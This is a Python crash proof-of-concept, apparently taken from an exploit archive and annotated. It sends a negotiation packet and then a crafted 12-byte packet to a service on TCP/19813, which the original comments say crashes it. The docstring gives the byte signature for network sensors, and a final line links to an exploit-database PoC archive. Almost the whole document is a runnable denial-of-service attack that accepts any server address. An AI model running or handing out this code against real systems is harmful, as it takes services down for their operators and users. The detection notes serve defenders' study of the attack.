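#!/usr/bin/python
"""Crash proof-of-concept for a service listening on TCP/19813.

The script connects, reads the server's first reply, sends a 12-byte
negotiation request and then a second 12-byte packet which, according to
the original author's comments, crashes the service.  This listing does
not name the affected product or version.

TCP payloads as built below (three unsigned 32-bit fields per packet):

    negotiation : 01 00 00 01 | 00 00 00 00 | 01 02 03 04
    second pkt  : 02 00 00 01 | 00 00 00 01 | 01 02 03 04

These are the bytes a network sensor would observe.  Whether legitimate
clients send the same signature field is not shown here, so compare with
known-good traffic before alerting on it.
"""
import socket,struct,sys,os

# Constant placed in the last field of both packets ("signature" per the
# original comment).
SIGN=0x04030201
# Base value for the first field; +0x1 and +0x2 select the two requests.
cmd=0x01000000


def main():
    """Send the negotiation packet, then the packet marked "crash".

    Expects exactly one command-line argument, the server address.  The
    exit status is 0 on a usage error and on a connection failure, the
    same as in the original script.
    """
    if len(sys.argv) != 2:
        # print() with a single argument behaves the same on Python 2 and 3.
        print("\n[x] Usage: python " + sys.argv[0] + " < ip_server >\n")
        sys.exit(0)
    host = sys.argv[1], 19813  # default port TCP/19813

    # Both command strings are constants; no user input reaches the shell.
    if sys.platform == "win32":
        os.system("cls")
    else:
        os.system("clear")

    s = socket.socket()
    try:
        try:
            s.connect(host)
            s.recv(1024)
        except socket.error:
            # Only network errors are reported as a connection failure; the
            # original bare "except:" also swallowed Ctrl-C and programming
            # errors and printed the same message for them.
            # NOTE(review): "This is g00d" presumably means an unreachable
            # port is the safe outcome -- wording kept from the original.
            print("[x] Error connecting to remote host! This is g00d :D.")
            sys.exit(0)

        print("[+] Building crafted packets...")
        # Negotiation request.  The first field is packed big-endian here
        # but little-endian in the second packet; the byte order is kept
        # exactly as the original script had it.
        pktnego = struct.pack(">L", cmd + 0x1)      # offset +0
        pktnego += struct.pack("<L", 0x00000000)    # offset +4
        pktnego += struct.pack("<L", SIGN)          # offset +8 (signature)

        # Second packet: same layout, middle field non-zero ("!= 0x0" in
        # the original).  The page does not explain what that field means.
        pkt1 = struct.pack("<L", cmd + 0x2)
        pkt1 += struct.pack(">L", 0x00000001)
        pkt1 += struct.pack("<L", SIGN)

        print("[+] Negotiation.")
        s.send(pktnego)
        s.recv(1024)
        s.send(pkt1)  # the original comment marks this send as the crash
    finally:
        # Release the socket on every path, including the failure exit
        # above, which previously left it open.
        s.close()


if __name__ == "__main__":
    main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip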